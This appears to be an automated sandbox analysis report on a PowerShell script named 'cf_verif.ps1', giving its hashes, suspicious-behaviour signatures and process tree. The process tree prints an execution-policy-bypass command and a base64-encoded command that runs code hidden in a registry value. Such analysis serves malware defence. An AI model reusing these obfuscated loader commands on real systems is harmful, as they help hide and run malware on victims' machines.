Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07/03/2025, 15:10
Static task
static1
Behavioral task
behavioral1
Sample
cf_verif.ps1
Resource
win7-20240903-en
General
-
Target
cf_verif.ps1
-
Size
679B
-
MD5
1b50d8010aab1860d73255e7857197b6
-
SHA1
960be1f5e7d05216ce2a1fd8012a7434e1d9c47e
-
SHA256
b18ed93dd979c6233b1ce6e195338a57243f2a71e6147311aaf06fccea1d20c7
-
SHA512
af037b5aeb04a96f9af623b3a96baa76ea6b62792a7552cbf5ee7f9ad18f09b0085b8874c1a46ffbc710bca6bc6d2105a70196028fb76bf781b652433c212c40
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2040 powershell.exe -
pid Process 2040 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2040 powershell.exe 2040 powershell.exe 2040 powershell.exe 2388 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2040 powershell.exe Token: SeDebugPrivilege 2388 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2040 wrote to memory of 2388 2040 powershell.exe 31 PID 2040 wrote to memory of 2388 2040 powershell.exe 31 PID 2040 wrote to memory of 2388 2040 powershell.exe 31
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\cf_verif.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFwAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgAnACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAYAAkAHAAaABhAG4AdABvAG0ALQBmAHIAWgBaAGYAKQA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d3186f7a0499030cd9862dcfb4b22ccd
SHA1672e0b7f1000d5d892b20d37d023db4f343b39c3
SHA25683637b2ef5d597e130e599bdc2cef7109b3aa4f3c8181bf7a6d43f1db2f26ed6
SHA512fac581545f70a6361cc99da605a17e79a141451eefc9b14685e90e98e7ebe6ed8c8d296a344c534a9ec9bbd464775dc350c19cfc74a7e1cb3f4c6ed8ab90bbbe